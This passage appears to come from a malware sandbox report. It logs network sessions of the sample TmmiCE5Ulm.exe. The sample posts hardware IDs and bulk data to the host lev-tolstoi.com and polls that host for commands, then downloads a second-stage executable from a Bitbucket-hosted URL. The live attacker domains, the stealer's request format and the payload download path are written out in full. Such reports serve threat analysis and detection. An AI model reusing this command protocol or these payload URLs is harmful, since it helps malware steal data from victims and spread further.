                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2159&min_rtt=1773&rtt_var=941&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13738&delivery_rate=1646926&cwnd=168&unsent_bytes=0&cid=8a88cac5f979793b&ts=1070&x=0"
2024-12-23 06:26:31 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f
ok 8.46.123.189
2024-12-23 06:26:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49708 | 104.21.66.86 | 443 | 5600 | C:\Users\user\Desktop\TmmiCE5Ulm.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:26:32 UTC | 281 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=BHAYJ4KONJV7SU6NGE
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 15083
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
2024-12-23 06:26:32 UTC | 15083 | OUT | Data Ascii:
--BHAYJ4KONJV7SU6NGE
Content-Disposition: form-data; name="hwid"

CA6F6071FF4C42A1AC8923850305D13E
--BHAYJ4KONJV7SU6NGE
Content-Disposition: form-data; name="pid"

2
--BHAYJ4KONJV7SU6NGE
Content-Disposition: form-data; name="lid"

LOGS11--LiveT
2024-12-23 06:26:33 UTC | 1130 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:33 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=pi3vrq2pt90813okkvjl0e6lbl; expires=Fri, 18 Apr 2025 00:13:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WvGEd0QjMCs6ZjTVYqW%2FXvwd9bjBrQmcpzIq6ZyW1j%2BgxTx08CDzTvamkXbvj%2Fpio66G0ZWo6r2XWfhUtzpvPg9iXO0q1qHsMeXyCqlwWi%2FnTjxC0s94R5QsLY02hUaj5g8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f6647d99b510f6f-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1482&rtt_var=561&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2836&recv_bytes=16022&delivery_rate=1941489&cwnd=209&unsent_bytes=0&cid=2714011922ad15d0&ts=1000&x=0"
2024-12-23 06:26:33 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f
ok 8.46.123.189
2024-12-23 06:26:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49709 | 104.21.66.86 | 443 | 5600 | C:\Users\user\Desktop\TmmiCE5Ulm.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:26:34 UTC | 275 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=I71U69D925SI
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 20537
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
2024-12-23 06:26:34 UTC | 15331 | OUT | Data Ascii:
--I71U69D925SI
Content-Disposition: form-data; name="hwid"

CA6F6071FF4C42A1AC8923850305D13E
--I71U69D925SI
Content-Disposition: form-data; name="pid"

3
--I71U69D925SI
Content-Disposition: form-data; name="lid"

LOGS11--LiveTraffic
--I71U69D9
2024-12-23 06:26:34 UTC | 5206 | OUT | Data Raw: (binary payload)
2024-12-23 06:26:35 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:35 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=fcshrdgseb8ep3hd3tnnbl63ta; expires=Fri, 18 Apr 2025 00:13:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wf4v1FqRxXOy2VtkF0odjrzCdlfQgH10mNN9aIRzwQss6rqHCzazqH%2BlfPDYMLUiOgNKxkr88La10eO8NFqxHUSE%2Ffcm57FQsj9ZSzNIriApAOTrsQvDMrxg5wsbdkKvUiw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f6647e8dfb61a3c-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1804&min_rtt=1799&rtt_var=685&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21492&delivery_rate=1585233&cwnd=229&unsent_bytes=0&cid=cbb15407b0c0309e&ts=983&x=0"
2024-12-23 06:26:35 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 06:26:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49713 | 104.21.66.86 | 443 | 5600 | C:\Users\user\Desktop\TmmiCE5Ulm.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:26:37 UTC | 273 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=HZ3IPPG7Q7N
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 1223
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
2024-12-23 06:26:37 UTC | 1223 | OUT | Data Raw: 2d 2d 48 5a 33 49 50 50 47 37 51 37 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 36 46 36 30 37 31 46 46 34 43 34 32 41 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 5a 33 49 50 50 47 37 51 37 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 5a 33 49 50 50 47 37 51 37 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 48 5a 33 49 50 50 47 37 51 37 4e
                                                                                                                                                                                                                                                                        Data Ascii: --HZ3IPPG7Q7NContent-Disposition: form-data; name="hwid"CA6F6071FF4C42A1AC8923850305D13E--HZ3IPPG7Q7NContent-Disposition: form-data; name="pid"1--HZ3IPPG7Q7NContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--HZ3IPPG7Q7N
2024-12-23 06:26:38 UTC | 1130 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:38 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=brdtc12ufm35bdil75qr93mf3i; expires=Fri, 18 Apr 2025 00:13:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZrDtL4weda5jhDcrnD%2F4vrZKX%2FPyxnda2qj3QNRSu%2FolGdYoWnfFv0l9%2FrV67tbk4EDuLlmcmtDRH5t5lKPMUqUhtSwJZR6B%2BvVNoeumxCnxRGKf5jrQvUrJ1pBkmKfGq%2BA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f6647f91d458c95-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1797&rtt_var=682&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2132&delivery_rate=1595628&cwnd=204&unsent_bytes=0&cid=81a580ab9837ae43&ts=785&x=0"
2024-12-23 06:26:38 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 06:26:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49716 | 104.21.66.86 | 443 | 5600 | C:\Users\user\Desktop\TmmiCE5Ulm.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:26:39 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=H8XL4F3YH8PVAL
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 551287
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
2024-12-23 06:26:39 UTC | 15331 | OUT | Data Raw: 2d 2d 48 38 58 4c 34 46 33 59 48 38 50 56 41 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 36 46 36 30 37 31 46 46 34 43 34 32 41 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 38 58 4c 34 46 33 59 48 38 50 56 41 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 38 58 4c 34 46 33 59 48 38 50 56 41 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 48 38
                                                                                                                                                                                                                                                                        Data Ascii: --H8XL4F3YH8PVALContent-Disposition: form-data; name="hwid"CA6F6071FF4C42A1AC8923850305D13E--H8XL4F3YH8PVALContent-Disposition: form-data; name="pid"1--H8XL4F3YH8PVALContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--H8
2024-12-23 06:26:44 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:44 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=1b6dh8fh07kb9vbd4b8vq6ten9; expires=Fri, 18 Apr 2025 00:13:20 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZoFIjWC4QThWitR%2BxAR%2FX0xqSwjQLOhBtvHBAFWO9cokHTbWhg4LUiVwYZNHjapoURUg%2BGdURWQRdEBelpi5AKoyqTLi2xo4H%2FkINi4Sd4AP7TqukGcq23UozNmTjkwdnDo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f664808ba1e41bb-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1726&min_rtt=1722&rtt_var=653&sent=194&recv=569&lost=0&retrans=0&sent_bytes=2835&recv_bytes=553763&delivery_rate=1664766&cwnd=205&unsent_bytes=0&cid=884f66ccf0028a51&ts=4264&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49733 | 104.21.66.86 | 443 | 5600 | C:\Users\user\Desktop\TmmiCE5Ulm.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:26:45 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 88
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
2024-12-23 06:26:45 UTC | 88 | OUT | Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=CA6F6071FF4C42A1AC8923850305D13E
2024-12-23 06:26:46 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:46 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=4skbemp9mebna8s29l6ogdjuln; expires=Fri, 18 Apr 2025 00:13:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GfalfO6sfq6vwyPFbdONhWOan%2BqkI%2FQmI6WFN2S%2FJNmeIL3uBwEq08cGzlJciv5TSF06wht%2ForDCPu2NP2ORNTxSi3ZtGyvxnPB1Vs2JaIfYq1vaUa9mwKq%2FhoOFRdW46CM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f66482cbdd18cb9-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1791&min_rtt=1786&rtt_var=681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=987&delivery_rate=1593016&cwnd=183&unsent_bytes=0&cid=8e6e28b794eab318&ts=789&x=0"
2024-12-23 06:26:46 UTC | 198 | IN |
                                                                                                                                                                                                                                                                        Data Ascii: c0EtriES0n35e4qJRIsCuuMgB9yyzYHj5/4Alwav7Ia3FJocBkDx39/8zc5DuKd4FuLx+iWLprXRSFfV4FjK83Xn+jjHRaULDl09vkKdNOnwAzTvoehDFNHI5tLEWapxwffrWDdV578NHX2vkpxF/HXGc+o02qd0oegmUVRJuwDlM++IRlDx3vu5rNtnKBVvM=
2024-12-23 06:26:46 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49739 | 185.166.143.49 | 443 | 5600 | C:\Users\user\Desktop\TmmiCE5Ulm.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:26:48 UTC | 248 | OUT | GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Host: bitbucket.org
2024-12-23 06:26:48 UTC | 5929 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:48 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Server: AtlassianEdge
                                                                                                                                                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNNKAFY4FX&Signature=JhHfBCFLHyX01YjJtloXBFvJXdM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAcaCXVzLWVhc3QtMSJIMEYCIQDWGRIMb9LXXZfl79VFTq%2FskFvxmioOtofL0dfIDqFZ2gIhAJP8GSyu6qftK4UeqX9cHuX5XOOr967KFLOAaxmwQGOTKrACCM%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2Igx0FWF5ybJCkmhX8pgqhAI4vlZyemYNIdhtILr1PBwGVPbyRawX2P9SOAz2sH4A2MXWbLs4VI9hExZK0Et1K%2FZfcAv2DK2%2F%2F3UbHXRF09xPQgClbYp%2BUS1fkeGjEn1qP%2BWN%2F0mNeOH6WJKEOgO9kxNbGmFR5%2FkdpRFho4uTMfUFiKjlhLrQRw6zkgUAadjCAt42zf2Eg5d4xi8HlEW7deLbE%2FM71ylNr%2FYb3X3TrZqMv1qaJkHPadg%2BUk0sct3PeuuUp0CaqVtex3wqgZbKjEbcNjMQ31Hh7gqXTU6knOY57iFcj%2BPJ5cpn8pXxspPZdFJdCoU3R2oQlF2BkZWmj6nywk6Rq9sTdCADM4SjzSxySMlaGzDBgqS7BjqcAXQQ9opzWNiG8NvY5n4BKs1tDtNnnJkDK9ZBfjAjPIA8iWxzfe9xFtNIbh1RExp6zD%2B7N2NmnwOrDW8mM [TRUNCATED]
                                                                                                                                                                                                                                                                        Expires: Mon, 23 Dec 2024 06:26:48 GMT
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                                                                                                        X-Used-Mesh: False
                                                                                                                                                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                                                                                                        X-Dc-Location: Micros-3
                                                                                                                                                                                                                                                                        X-Served-By: e6f4fa3680f5
                                                                                                                                                                                                                                                                        X-Version: c9b3998323c0
                                                                                                                                                                                                                                                                        X-Static-Version: c9b3998323c0
                                                                                                                                                                                                                                                                        X-Request-Count: 526
                                                                                                                                                                                                                                                                        X-Render-Time: 0.05421566963195801
                                                                                                                                                                                                                                                                        X-B3-Traceid: 76b057f9c66b4b7981fe6f9429dd4989
                                                                                                                                                                                                                                                                        X-B3-Spanid: 495678fd229469fb
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Content-Security-Policy: object-src 'none'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend [TRUNCATED]
                                                                                                                                                                                                                                                                        X-Usage-Quota-Remaining: 999055.167
                                                                                                                                                                                                                                                                        X-Usage-Request-Cost: 960.90
                                                                                                                                                                                                                                                                        X-Usage-User-Time: 0.028827
                                                                                                                                                                                                                                                                        X-Usage-System-Time: 0.000000
                                                                                                                                                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                                                                                                                                                        Age: 0
                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Atl-Traceid: 76b057f9c66b4b7981fe6f9429dd4989
                                                                                                                                                                                                                                                                        Atl-Request-Id: 76b057f9-c66b-4b79-81fe-6f9429dd4989
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                                                                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                                                                                                                                        Server-Timing: atl-edge;dur=167,atl-edge-internal;dur=5,atl-edge-upstream;dur=163,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49745 | 3.5.16.86 | 443 | 5600 | C:\Users\user\Desktop\TmmiCE5Ulm.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:26:50 UTC | 1338 | OUT | GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNNKAFY4FX&Signature=JhHfBCFLHyX01YjJtloXBFvJXdM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAcaCXVzLWVhc3QtMSJIMEYCIQDWGRIMb9LXXZfl79VFTq%2FskFvxmioOtofL0dfIDqFZ2gIhAJP8GSyu6qftK4UeqX9cHuX5XOOr967KFLOAaxmwQGOTKrACCM%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2Igx0FWF5ybJCkmhX8pgqhAI4vlZyemYNIdhtILr1PBwGVPbyRawX2P9SOAz2sH4A2MXWbLs4VI9hExZK0Et1K%2FZfcAv2DK2%2F%2F3UbHXRF09xPQgClbYp%2BUS1fkeGjEn1qP%2BWN%2F0mNeOH6WJKEOgO9kxNbGmFR5%2FkdpRFho4uTMfUFiKjlhLrQRw6zkgUAadjCAt42zf2Eg5d4xi8HlEW7deLbE%2FM71ylNr%2FYb3X3TrZqMv1qaJkHPadg%2BUk0sct3PeuuUp0CaqVtex3wqgZbKjEbcNjMQ31Hh7gqXTU6knOY57iFcj%2BPJ5cpn8pXxspPZdFJdCoU3R2oQlF2BkZWmj6nywk6Rq9sTdCADM4SjzSxySMlaGzDBgqS7BjqcAXQQ9opzWNiG8NvY5n4BKs1tDtNnnJkDK9ZBfjAjPIA8iWxzfe9xFtNIbh1RExp6zD%2B7N2NmnwOrDW8mME7nCVE9fi5w6eJ3rXchZXw4BEgi14dReaKJTufHw9TIj [TRUNCATED]
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: bbuseruploads.s3.amazonaws.com
2024-12-23 06:26:51 UTC | 574 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        x-amz-id-2: vLBwj/JY9JYKR84j/Hp2YZpLuUfFprvViPmeIHiJWosiV7egfhgMwbSPKoL89LSDU2eiafjeRlp2gjAjFUEDeeo/v+X2gud6
                                                                                                                                                                                                                                                                        x-amz-request-id: YEP2875BAVXAHBJ8
